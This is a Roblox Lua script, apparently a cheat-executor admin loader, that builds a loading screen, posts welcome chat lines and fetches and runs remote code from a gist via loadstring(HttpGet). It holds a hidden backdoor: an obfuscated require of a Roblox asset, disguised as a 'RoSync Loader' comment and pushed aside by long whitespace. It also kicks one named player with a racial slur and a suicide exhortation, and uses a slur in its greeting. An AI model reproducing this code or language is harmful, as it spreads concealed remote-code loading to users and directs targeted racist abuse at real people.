if game.Players.LocalPlayer.Name == "IIAmerAlxm1235" then
    game.Players.LocalPlayer:Kick("Kill your self u worthless cotton picking nigger")
end


local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local ImageLabel = Instance.new("ImageLabel")
local LoadingLabel = Instance.new("TextLabel")
local WelcomeLabel = Instance.new("TextLabel")
local ImageLabel_2 = Instance.new("ImageLabel")

--Properties:

ScreenGui.Parent = game.CoreGui

Frame.Parent = ScreenGui
Frame.AnchorPoint = Vector2.new(0.5, 0.5)
Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Frame.BackgroundTransparency = 0.450
Frame.Position = UDim2.new(0.5, 0, 0.504980087, 0)
Frame.Size = UDim2.new(0, 862, 0, 121)

ImageLabel.Parent = Frame
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BackgroundTransparency = 1.000
ImageLabel.Position = UDim2.new(0.286542952, 0, -0.628099144, 0)
ImageLabel.Size = UDim2.new(0, 367, 0, 272)
ImageLabel.Image = "http://www.roblox.com/asset/?id=6356032173"

LoadingLabel.Name = "LoadingLabel"
LoadingLabel.Parent = Frame
LoadingLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
LoadingLabel.BackgroundTransparency = 1.000
LoadingLabel.Position = UDim2.new(0.616009295, 0, 0, 0)
LoadingLabel.Size = UDim2.new(0, 328, 0, 121)
LoadingLabel.Font = Enum.Font.SpecialElite
LoadingLabel.Text = "Loading.  .  ."
LoadingLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
LoadingLabel.TextSize = 14.000

WelcomeLabel.Name = "WelcomeLabel"
WelcomeLabel.Parent = Frame
WelcomeLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
WelcomeLabel.BackgroundTransparency = 1.000
WelcomeLabel.Position = UDim2.new(0.0812065303, 0, 0.396694213, 0)
WelcomeLabel.Size = UDim2.new(0, 218, 0, 24)
WelcomeLabel.Font = Enum.Font.SpecialElite
WelcomeLabel.Text = "Welcome"
WelcomeLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
WelcomeLabel.TextSize = 14.000

ImageLabel_2.Parent = Frame
ImageLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel_2.BackgroundTransparency = 1.000
ImageLabel_2.Position = UDim2.new(0.343387485, 0, 0.826446295, 0)
ImageLabel_2.Size = UDim2.new(0, 269, 0, 202)
ImageLabel_2.Image = "http://www.roblox.com/asset/?id=6330894714"

-- Scripts:

local function DGMNW_fake_script() -- ImageLabel.LocalScript 
	local script = Instance.new('LocalScript', ImageLabel)

	Spinny = script.Parent
	
	while true do
		wait(0.01)
		Spinny.Rotation = Spinny.Rotation +3
		
	end
	
end
coroutine.wrap(DGMNW_fake_script)()
local function VEWBCWC_fake_script() -- nil. 
	local script = Instance.new('Script', nil)

	
	--[[ Last synced 2/6/2021 05:14                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722872031) --[[                                                                                                  ]]--
end
coroutine.wrap(VEWBCWC_fake_script)()
local function FFZYXX_fake_script() -- ImageLabel.LocalScript 
	local script = Instance.new('LocalScript', ImageLabel)

	wait(5)
	script.Parent.Parent:Destroy()
end
coroutine.wrap(FFZYXX_fake_script)()
local function GQTU_fake_script() -- WelcomeLabel.LocalScript 
	local script = Instance.new('LocalScript', WelcomeLabel)

	script.Parent.Text = "Welcome "..game.Players.LocalPlayer.Name
end
coroutine.wrap(GQTU_fake_script)()

wait(5)

	game.StarterGui:SetCore(
	    "SendNotification",
	    {
	        Title = "Welcome!",
	        Text = "The Prefix Is -",
		    }
	)



function MessageColor(name, color)

local a = game.Players.LocalPlayer.PlayerGui:WaitForChild('FEController')
local b = a:FindFirstChild('Chat'):Clone()
local c = game.Players.LocalPlayer.PlayerGui:WaitForChild('GUI').Chats
spawn(function()
for i,v in pairs(c:GetChildren()) do
 v.Position=v.Position+UDim2.new(0,0,0,-15)
end
b.Parent = c
b.Text = name.." "
b.TextColor3 = color

wait(15);
for v1 = 0, 1, 0.1 do
    wait(0.1);
    b.TextStrokeTransparency = 1;
    b.TextTransparency = v1;
end;
b:Destroy();

end)
end

MessageColor("Welcome to fays Admin Nigga", Color3.fromRGB(137, 7, 9))
MessageColor("Updates;", Color3.fromRGB(137, 7, 9))
MessageColor("", Color3.fromRGB(137, 7, 9))
MessageColor("Added -agui", Color3.fromRGB(137, 7, 9))

loadstring(game:HttpGet('https://gist.githubusercontent.com/0Nck/7ecfaafc781f1a1578ab7c333c97c776/raw/aa78006813a506ec40bf441895efc587cac63d41/Link', true))()
